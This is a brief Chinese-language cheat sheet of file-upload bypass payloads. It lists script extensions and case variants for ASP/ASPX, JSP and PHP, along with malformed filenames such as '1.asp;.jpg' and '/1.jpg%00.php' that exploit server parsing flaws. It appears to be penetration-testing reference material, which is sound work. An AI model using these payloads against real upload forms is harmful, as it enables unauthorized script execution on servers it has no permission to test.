## 上传相关

**1.ASP/ASPX** 

**(1)后缀名**


```
['asp', 'aspx', 'asa', 'asax', 'ascx', 'ashx', 'asmx', 'cer', 'swf', 'cdx', 'xml', 'htr']
```


**(2)大小写**


```
['aSp', 'aSpx', 'aSa', 'aSax', 'aScx', 'aShx', 'aSmx', 'cEr', 'sWf', 'cDx', 'xMl', 'hTr']
```


**(3)常见解析漏洞payload**


```
- 1.asp;.jpg
- 1.asp.jpg 
- 1.asp;jpg 
- +111.asp;+222.jpg 
- /111.asp/1.jpg 
- /111.aspx/1.jpg
```


**(4)双文件名扩展：** 

- test.asp.jpg

**2.JSP**

**(1)后缀名**


```
['jsw', 'jsv', 'jspf', 'jsp', 'jspa', 'jsps', 'jspx', 'jhtml']
```


**(2)大小写**


```
['jSw', 'jSv', 'jSpf', 'jSp', 'jSps', 'jSpa', 'jSpx', 'jSpa', 'jHtml']
```


**(3)畸形数据-用两个jsp包围中间的jpg**

1.jsp.jpg.jsp

**3.PHP** 

**(1)后缀名**

```

['php', 'php7', 'php5', 'php4', 'php3', 'php2', 'phpt', 'php3p', 'phtml', 'pht']
```


**(2)大小写**


```
['pHp', 'pHp7', 'pHp5', 'pHp4', 'pHp3', 'pHp2', 'pHpt', 'pHp3p', 'pHtml', 'pHt']
```


**(3)常见解析漏洞payload**


```
- 1.php.jpg
- 1.jpg.php
- 1.php  jpg(jpg前面两个空格)
- 1.php jpg(jpg前面一个空格)
- /1.jpg/1.php
- /1.jpg%00.php
- /1.jpg/.php
- /1.jpg/php
```

